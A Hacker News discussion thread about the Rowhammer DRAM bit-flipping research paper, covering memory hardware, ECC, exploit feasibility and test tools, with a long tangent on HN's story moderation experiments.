
Flipping bits in memory without accessing them [pdf] - ColinWright
https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf
======
kabdib
What goes on at the chip level is terrifying. "You have to understand," a
hardware engineer once said to me, when we shipped a consumer computer that
was clocking its memory system 15% faster than the chips were supposed to go,
"that DRAMs are essentially analog devices." He was pushing them to the limit,
but he knew what it was, and we never had a problem with the memory system.

There was a great TR from IBM describing memory system design for one of their
PowerPC chips. Summary: Do your board layout, follow all these rules [a big
list], then plan to spend six months in a lab twiddling transmission line
parameters and re-doing layout until you're sure it works . . .

~~~
hga
True horror story: The first board I was involved with when working at Lucent
in 2001 was a monster modem card, provided something like 300 modems plus or
minus. For a long time in the development process we had a weird reliability
problem which just could not be tracked down. Until in desperation a hardware
engineer started putting his scope probe _everywhere_ ... and found a line (or
set of them) where the signal was messed up in the middle but not at the
end!!!

Analog is a black art.

~~~
nitrogen
Black arts are just arts with more rules than we ourselves understand. I don't
think we should let that scare us from trying to understand. It's all just
physics.

~~~
kabdib
It's also about manufacturing tolerance, making room for error, suffering
environmental stuff and understanding that the universe is out to get you.
Sure, in reductio ad absurdum it's all just physics, but most of shipping a
product is making engineering tradeoffs, dealing with complex stuff you may
not fully understand, and making plans for when vendor B's product isn't
exactly the same as vendor A's chips, but vendor A was just bought by Apple
and won't talk to you any more, at any price. :-)

------
hammer_test
Note: the regular memtest+ doesn't have this test. Use the researcher fork:

[https://github.com/CMU-SAFARI/rowhammer](https://github.com/CMU-
SAFARI/rowhammer)

in Ubuntu 14.04, run this to bring all the dependencies for building: sudo
apt-get build-dep memtest86+

Update: just finished running the test on my cheap Lenovo laptop. Not
affected. phew! :)

~~~
Tobu
It's been upstreamed, hasn't it?

Announcement
[http://www.passmark.com/forum/showthread.php?4836-MemTest86-...](http://www.passmark.com/forum/showthread.php?4836-MemTest86-v6-0-Beta)

Previous discussion
[https://news.ycombinator.com/item?id=8713411](https://news.ycombinator.com/item?id=8713411)

------
zanethomas
The success of this approach to corrupting memory depends upon knowing the
geometry of the memory chip. Naive calculations of which addresses correspond
to an adjacent row may be incorrect.

It's interesting to see this issue addressed in 2015. In 1980 I worked at
Alpha Microsystems and designed a memory chip test program which used
translation tables based upon information we required chip manufacturers to
give us in order for their chips to be used in the systems we sold.

That approach required us to only put one type of memory chip on a memory
board. But back in the day microsytems were expensive and customers expected
them to be well-tested.

~~~
hga
My family thanks you and your colleagues.

Back in mid-1979, just before I went to college, I looked at the current
alternatives and picked Alpha Micro as the company to go with for a system to
computerize a bunch of doctor's offices. It worked very well, and then another
one a few years later when they used one to help systematize a company
providing satellite TV gear.

------
jhowe
I work in the chip industry. This was a good paper.

1\. Note that chip-kill/Extended ECC/Advanced ECC/Chipspare which are all
similar server vendor methods for 4-bit correction will prevent this problem.
These methods are enabled on the better reliability server systems.

2\. This failure mode has been known by the DRAM industry for a couple years
now and the newest DRAM parts being produced have this problem solved. The
exact solution varies by DRAM vendor. I wish I could go into specifics but I
am unaware of any vendor that has stated publicly their fix.

~~~
userbinator
_the newest DRAM parts being produced have this problem solved_

How new exactly? The newest tested in the paper is from July 2014 and that
still has the problem.

~~~
rab_oof
You're more than right. In fact, the paper explicitly mentions 4 correct 5
detect (but fail) doesn't solve the issue because each victim row on either
side of the attacker row attains varying levels of multibit (5+) errors.

It doesn't fix systems deployed right now, and could be used for attacking
hypervisors and other multitenant systems. Might make an interesting class of
local privilege escalation attacks to try probabilistically of otherwise
correctly-secured systems too.

------
BetaCygni
Excellent article! The fact that they can reliably produce errors in most ram
chips is worrying. They also provide a solution (probabilistic refresh of
neighboring lines).

~~~
userbinator
The scary thing is that such a "solution" could be silently disabled, with
effectively no signs of any problem (and in fact it would probably increase
performance a little!) - I mentioned this in the previous discussion here:
[https://news.ycombinator.com/item?id=8716977](https://news.ycombinator.com/item?id=8716977)

I know there are other parameters of the memory controller that could be
changed to cause corruption, e.g. reducing the refresh rate or tweaking the
timings, but that is likely to yield random corruptions in normal use instead
of this precise one.

To me, the real solution seems to be stop making DRAM with such high density
processes until some design changes can be done that make them as reliable as
before, because at some point it just stops behaving like real memory anymore
and turns into a crude approximation of it; memory should be reliable and
store the data it holds, without any corruption regardless of access pattern.

------
bhouston
How long until someone uses this as the basis of an exploit? Maybe not root
access, but if you can figure out an OS call that replicates the access
pattern, you can corrupt machines just by interacting with them.

~~~
ajross
There's no need for an OS call. Just userspace access to the same mapped
memory is going to stay in the same physical page for far, far, longer than a
few hundred thousand DRAM cycles. Obviously the hard part to an exploit would
be locating those corrupt bits elsewhere in the system. That's going to depend
entirely on the hardware layout of the DRAM chip.

~~~
witty_username
And I guess ASLR would make it even harder.

~~~
johnsmith108959
ASLR only affects the virtual address space. The physical memory allocations
are all probably unaffected by ASLR.

------
markbnj
This article actually contains one of the better-written fundamental
explanations of DRAM operation that I've read. Thanks for the post.

------
mseaborn
Here is a program for testing for the DRAM rowhammer problem which runs as a
normal userland process: [https://github.com/mseaborn/rowhammer-
test](https://github.com/mseaborn/rowhammer-test)

Note that for the test to do row hammering effectively, it must pick two
addresses that are in different rows but in the same bank. A good way of doing
that is just to pick random pairs of addresses. If your machine has 16 banks
of DRAM, for example (as various machines I've tested do), there should be a
1/16 chance that the two addresses are in the same bank. This is what the test
above does. (Actually, it picks >2 addresses to hammer per iteration.)

Be careful about running the test, because on machines that are susceptible to
rowhammer, it could cause bit flips that crash the machine (or worse, bit
flips in data that gets written back to disc).

------
blinkingled
Hopefully this doesn't affect ECC DRAM? Also does the problem get worse with
increased density - i.e. 16GB modules are more vulnerable than say the 8GB
ones?

~~~
twotwotwo
It helps, but they point out you can get two-bit errors ECC can merely detect
(or, much more rarely, 3+-bit errors ECC isn't guaranteed to even detect).
Mighty tricky to work out that exploit that flips just the right two security-
relevant bits, though.

------
diydsp
From abstract:

High speed DRAM reads influence nearby cells. Reproduced on 110 of 139 mem
modules after 139k reads on intel and amd. 1 in 1.7k cells affected.

------
phkahler
Problem: They propose a solution and calculate the reliability of the
solution. Why not test it with their FPGA based memory controller and
demonstrate an improvement?

Second: While the problem looks real enough, the tests to demonstrate it are
not realistic. Hammering the same rows with consecutive reads does not happen
in the real world due to caches which the get around via flushes. I'd like to
see more data on how bad the abuse needs to be to cause the problem. Will 2
reads in a row cause errors? 5? 10? 100? They never address how likely this is
to be a real-world problem. I don't doubt that it is, but how often?

~~~
xenadu02
They address all of these in the paper. It takes ~180,000 "hammered" reads to
trigger. The problem is even the least-privileged code can do it because it's
just reading without using the cache - a perfectly valid thing that must be
allowed for multi-threaded code to even work correctly.

Secondly, the DRAM makers don't currently provide enough information to
reliably know what neighbors to refresh. I suppose they could have used their
guesses to test on the FPGA rig but given the rest of the paper I'm reasonably
satisfied that they have correctly identified the problem and that their
solution would work.

~~~
kabdib
Sometimes an exploit simply needs to make more trusted code take an exception
(often after "paving" memory with known values). Since an exception can be
theoretically be induced by user-mode code flipping bits in structures it
doesn't own . . .

I can see "exploit resistant memory" being a selling point, maybe soon.

------
rebootthesystem
I've completed many multi-gigahertz product designs during my career. If you
take the time to study and understand the physics involved and bother to do a
bit of math none of it is particularly difficult. I reject the
characterization of this as some kind of a black art. It's not magic. Yes, of
course, experience helps, but it isn't magic. One problem is that some in the
industry are still using people who do layout based on how things look rather
than through a scientific process. Yes, it's analog electronics. When was it
anything else?

Want to wrap yourself around another challenging aspect of high-speed design?
Power distribution system design (PDS). You can design perfect boards based on
solid transmission line and RF theory and have them fail to work due to issues
such as frequency-dependent impedances and resonance in the PDS.

------
pera
So basically you just make a couple memory reads a few hundred thousands times
and this will alter some near cell? why manufacturers didn't test this? it
looks like a pretty obvious thing to test while working at these scales.

~~~
mud_dauber
b/c the applications that care the most about these types of errors (big iron
networking, and mil/aero) implement software error correction in the
processor. It's not worth spending the extra money in final test when
commodity DRAM is, well, a commodity.

~~~
johnsmith108959
Yes, ECC memory, although it's mostly implemented by the chipset and DRAM
modules, with only a small part of it being in the processor.

~~~
mud_dauber
Thanks for the clarification John.

------
kazinator
Interestingly, the researchers used a Xilinx FPGA, not just an off-the-shelf
AMD or Intel PC.

Why not?

If the attack can only be reproduced by custom hardware, why should anyone
care?

Also, precise patterns of access to DRAM would require disabling the L1 and L2
caches. Doesn't that sort of thing require privileged instructions?

With caching in place, memory accesses are indirect. You have to be able to
reproduce the attack using only patterns of cache line loads and spills.

~~~
kmowery
No, they reproduced on "Intel (Sandy Bridge, Ivy Bridge, and Haswell) and AMD
(Piledriver) systems using a 2GB DDR3 module." (see Section 4)

They evict cache lines using the CLFLUSH x86 instruction, which I believe is
unprivileged.

~~~
dllthomas
CLFLUSH is definitely unprivileged - I made use of it on a recent project
(evicting outbound messages from a core's cache cut cash misses meaningfully).

------
jhallenworld
I think row hammer is basically a DRAM design defect and wish it was fixed in
the DRAM instead of on the controller side. At the very least the DRAM vendors
should document this access pattern limitation in their datasheets.

------
rab_oof
Am I wrong (if you happen to work on processor microcode) or could microcode
patches per processor insert a minimum delay where needed based on RAM
parameters and organization to prevent this?

------
tsukikage
So, busywaiting on spinlocks considered dangerous?

~~~
nitrogen
That would probably read from cache most of the time.

------
edwintorok
Why doesn't it mention the manufacturers' names?

~~~
mud_dauber
The work _may_ have been funded by the manufacturers in return for the
analysis and discretion.

There's not that many DRAM manufacturers in the world. Micron, Samsung,
Elpida, Hynix are all excellent bets.

------
jadc
Discussion from a couple of weeks ago:

[https://news.ycombinator.com/item?id=8713411](https://news.ycombinator.com/item?id=8713411)

~~~
ColinWright
Missed that - thanks - although to be fair there doesn't actually seem to be
that much discussion. Maybe most people missed it.

Edit: Just checking, it was at 120, looks like it got artificially promoted to
25, then sank quickly.

[http://hnrankings.info/8713411/](http://hnrankings.info/8713411/)

~~~
wdewind
> looks like it got artificially promoted to 25

How does that happen?

~~~
ColinWright
The mods have in place mechanisms to find submissions they think have slipped
through the net and provide a boost for them. It's experimental and
undocumented, but I saw it mentioned a while ago[0].

I think it's a good thing, even if it's somewhat arbitrary and has multiple
false-positives and false-negatives. I've always been a fan of stochastic
processes - they exhibit lots of good behavior, and comparatively few
pathological flaws.

[0]
[https://news.ycombinator.com/item?id=8157698](https://news.ycombinator.com/item?id=8157698)

~~~
wdewind
Honestly I'm bummed to see a lot of the recent aggressive moderation. I know
the community is far from perfect, but seeing arbitrary posts moved to the
front page, existing stuff on the front page change not only in title but also
in the article its linked to after existing discussion have happened etc. all
strike me as obviously worse than just letting the chaos of the community sort
itself out.

~~~
dang
I'm bummed that you're bummed. But we may not disagree as much as it seems, so
let me try clarifying.

Our plan is to turn as much moderation over to the community as possible;
getting there is going to require additional mechanisms. HN has one axiom:
it's a site for stories that gratify intellectual curiosity. All the rest is
details. The existing mechanisms—upvoting and /newest—are insufficient for the
community to sort out which stories are best by that standard. The trouble
with upvoting is that stories that gratify intellectual curiosity regularly
attract fewer upvotes than stories that are interesting for other reasons. The
trouble with /newest is that not enough users will sift through it to find the
best submissions. That's easy to understand: it's tedious. Wading through
hundreds of posts to find perhaps 3% that gratify intellectual curiosity, does
not gratify intellectual curiosity! The very reason people come to HN is a
reason not to want to do that, and so we have a tragedy of the commons.

So if upvoting and /newest are suboptimal for HN, what should we do? In the
long run, the answer hopefully is to have a new system that lets the community
take care of it. But in the short run, before we know what the new system
should be, our answer is (a) to experiment, and (b) to do things manually
before trying to systematize anything.

Over the last several months, we've tried various things. For example, we
tried randomly placing a story from /newest on the front page. We didn't roll
that out to everybody, but we did for enough users to make it clear that it
wasn't going anywhere. The median randomly selected story is too poor in
quality for this to work.

Of our experiments, the one that has produced by far the best results (to
judge by receipt of upvotes, non-receipt of flags, and comments about the
article being good) is reviewing the story stream for high-quality submissions
and occasionally lobbing one or two of them onto the bottom of the front page.
That's the experiment ColinWright was referring to. The idea is, from the pool
of stories that would otherwise fall through the cracks, for humans to pick
candidates for second exposure. These get a randomized shot at the front page
long enough for the community to decide their fate. Most fall away quickly,
but some get taken up, and so the HN front page sees more high-quality
stories. It's important to realize that this is a supplement to the ordinary
mechanism of users upvoting stories from /newest. That works the same as
always.

This is not a permanent system—just an experiment to gain information—and one
lesson we've drawn from it is that moderators should not be doing all the
reviewing. We'd prefer it to be community-driven, and anyway there are too
many stories and too few of us to look at them all. At the same time, the
results have been so salutary that I feel obliged to continue doing it until
we can replace it with something better.

What system might we build so the community can do this work and we don't have
to? If upvoting and /newest can't do it, what could?

HN already has a mechanism for mitigating the problems with upvoting:
flagging. Where upvoting works worse than one would expect, flagging works
better. (We do have to compensate for bad flagging, but surprisingly little.)
But flagging only helps weed out inappropriate stories; it does nothing to
help the best stories surface. So one thought is that we need a mechanism
similar to flagging, but positive rather than negative.

As for /newest, if the problem is that there's no incentive to do it, we need
to make it rewarding. HN already has a reward mechanism: karma. Perhaps users
who put in the work of sifting through new stories could be rewarded in karma
[1].

Put these two thoughts together and the idea that emerges is of a story-
reviewing mechanism, similar to flagging but focused on identifying good
stories, where any user who puts in the effort and does a good job is rewarded
in karma for service to the community.

The challenge is in defining _a good job_. It can't be something you could
write a computer program to do—short of writing a program to identify all the
best stories, of course, in which case you deserve all the karma. If a story
eventually gets lots of upvotes (and few flags), that would be one way of
scoring a good review. But there need to be other ways, because there are many
more good stories than slots on the front page.

And with that you pretty much have a core dump of our current thinking on
story curation—subject to change as new ideas emerge.

1\. HN could use a new way of earning karma anyhow. A common criticism, which
I think has merit, is that the current system is a rich-get-richer affair
where most gains accrue to a clique of old-timers and there's little chance
for anyone new to catch up.

~~~
wdewind
Thanks for replying, dang, I appreciate it.

I'm on this site a fair amount and don't feel super informed about the ongoing
plans (was surprised to hear about the artificial movement of stories, for
instance). Any details you could provide there would be really helpful, and
I'm sure the community would appreciate knowing what's in store. Maybe even a
dedicated page for news about the hn platform/algo and experiments.

> The existing mechanisms—upvoting and /newest—are insufficient for the
> community to sort out which stories are best by that standard. The trouble
> with upvoting is that stories that gratify intellectual curiosity regularly
> attract fewer upvotes than stories that are interesting for other reasons.

I think this fact is undebatable but the question is which scales better?
Large communities with heavy moderation have frequently descended into
corruption quickly. Again, I think communicating your plans/experiments would
be really helpful (and also gratifying of intellectual curiosity!)

~~~
dang
I'm in the process of expanding on my comment above; "I'll add more in a bit"
means in a few minutes when I have time to write more. That's the only reason
I don't post more about this, by the way—it's time-consuming, and takes
already-limited time away from actually doing any of the things being written
about. So I mostly just reply to questions when people have them. Anyhow,
please check back in a little while and I'll try to explain more.

~~~
wdewind
That's cool, but with respect, it might be better to turn it into a brief
summary and repost it as a top level item. This child thread is deep and
buried now so few users are going to see it.

~~~
dang
That's a natural suggestion, but my experience is that it doesn't work so
well. If I make a top-level post out of this, it will lose the feeling of
"conversation with a user", become something official, and other factors will
kick in. There's a place for that, of course, but it's a different thing and
one mustn't overdo it. I will formally ask for feedback when we get closer to
knowing what we're asking about, but for now it's just thinking out loud.

Also, you'd be surprised at how much the information in discussions like this
makes its way into circulation. People do find this stuff, and I think it's
more fun to run across it this way.

------
blazespin
Sounds like a great technique for ddos.

